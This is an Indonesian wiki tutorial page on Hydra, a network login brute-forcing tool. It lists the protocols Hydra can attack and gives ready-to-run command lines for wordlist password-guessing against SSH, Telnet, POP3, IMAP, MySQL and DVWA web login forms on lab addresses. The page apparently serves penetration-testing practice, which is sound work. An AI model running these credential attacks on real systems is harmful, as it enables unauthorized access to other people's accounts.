Hydra

From OnnoWiki
Revision as of 13:40, 2 June 2018 by Onnowpurbo (talk | contribs)
Jump to navigation Jump to search

Hydra adalah network log yang sangat terkenal dan dihormati oleh cracker yang dapat mendukung layanan yang berbeda.


System yang di serang 

Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird,
FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD,
HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD,
HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP,
Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3,
POSTGRES, RDP, Rexec, Rlogin, Rsh, S7-300, SAP/R3, SIP, SMB, SMTP,
SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion,
Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

Contoh cara menggunakan 

hydra -L userlist.txt -P password.txt namaprotocol://mesin-korban
hydra -L userlist.txt -P passwordlist.txt ssh://192.168.0.80
hydra -L userlist.txt -P passwordlist.txt -e ns -u -f ssh://192.168.0.80
hydra -L userlist.txt -P passwordlist.txt -e ns -u -f telnet://192.168.0.80
hydra -L userlist.txt -P passwordlist.txt -e ns -u -f pop3://192.168.0.80
hydra -L userlist.txt -P passwordlist.txt -e ns -u -f imap://192.168.0.80
hydra -L userlist.txt -P passwordlist.txt -e ns -u -f 192.168.0.80 mysql

hydra -L /usr/share/nmap/nselib/data/dvwauser.txt -P /usr/share/nmap/nselib/data/dvwapass.txt 192.168.0.97 mysql
hydra -L /usr/share/nmap/nselib/data/dvwauser.txt -P /usr/share/nmap/nselib/data/dvwapass.txt 192.168.0.97 telnet
hydra -L /usr/share/nmap/nselib/data/dvwauser.txt -P /usr/share/nmap/nselib/data/dvwapass.txt 192.168.0.97 ssh

Untuk DVWA 

hydra 192.168.0.108 -l admin -P /usr/share/set/src/fasttrack/wordlist.txt http-post-form "/DVWA-1.9/login.php:username=admin&password=^PASS^&Login=Login:Login failed"

hydra -l admin -p password   http-get-form "/DVWA-1.0.8/login.php:username=^USER^&password=^PASS^&submit=Login:Login failed"
hydra –L UserNameFile –P PasswordFile –e ns –t 32 –u –f –m /DVWA-1.0.8/login.php:username=^USER^&password=^PASS^&Login=Login <IP> http-post-form
hydra –L userlist.txt –P passwordlist.txt –e ns –t 32 –u –f –m /DVWA-1.0.8/login.php:username=^USER^&password=^PASS^&Login=Login 192.168.0.80 http-post-form
hydra -L dvwauser.txt -P dvwapass.txt 192.168.0.97 http-post-form "/DVWA-1.9/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed"


Referensi

General usage and options

HTTP basic auth

HTTP form based auth

Multiple protocols

Telnet

Retrieved from "https://onnocenter.or.id/wiki/index.php?title=Hydra&oldid=51265"